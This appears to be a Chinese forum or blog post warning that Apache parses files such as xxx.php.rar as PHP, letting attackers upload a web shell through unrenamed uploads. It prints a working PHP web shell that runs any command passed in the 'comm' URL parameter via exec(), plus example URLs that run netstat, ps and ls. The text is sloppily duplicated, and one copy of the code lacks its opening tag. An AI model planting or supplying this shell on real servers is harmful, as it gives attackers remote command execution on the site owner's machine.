关于php apache后缀漏洞 附测试代码
很致命的漏洞,如果你的程序有这方面的问题。
主要危害是带上传功能的应用。
如果你是把上传的文件统一改名了还好。
如果没有改名。那么就危险拉。
如果他上传jpg,gif,zip还好说拉。如果他上一个 xxx.php.rar 的文件那么就轻松拿到你的web sheel 拉 。
以上代码另存为test.php.rar
测试代码:
http://localhost:/test.php.rar?comm=netstat -n
http://localhost:/test.php.rar?comm=ps -A
http://localhost:/test.php.rar?comm=ls
很致命的漏洞,如果你的程序有这方面的问题。
主要危害是带上传功能的应用。
如果你是把上传的文件统一改名了还好。
如果没有改名。那么就危险拉。
如果他上传jpg,gif,zip还好说拉。如果他上一个 xxx.php.rar 的文件那么就轻松拿到你的web sheel 拉 。
QUOTE:
<?
if($_GET[comm]!='')
{
exec($_GET[comm],$re);
foreach($re as $v)
echo $v.'<br>';
}
else
exit('Please input command...');
?>
if($_GET[comm]!='')
{
exec($_GET[comm],$re);
foreach($re as $v)
echo $v.'<br>';
}
else
exit('Please input command...');
?>
以上代码另存为test.php.rar
测试代码:
http://localhost:/test.php.rar?comm=netstat -n
http://localhost:/test.php.rar?comm=ps -A
http://localhost:/test.php.rar?comm=ls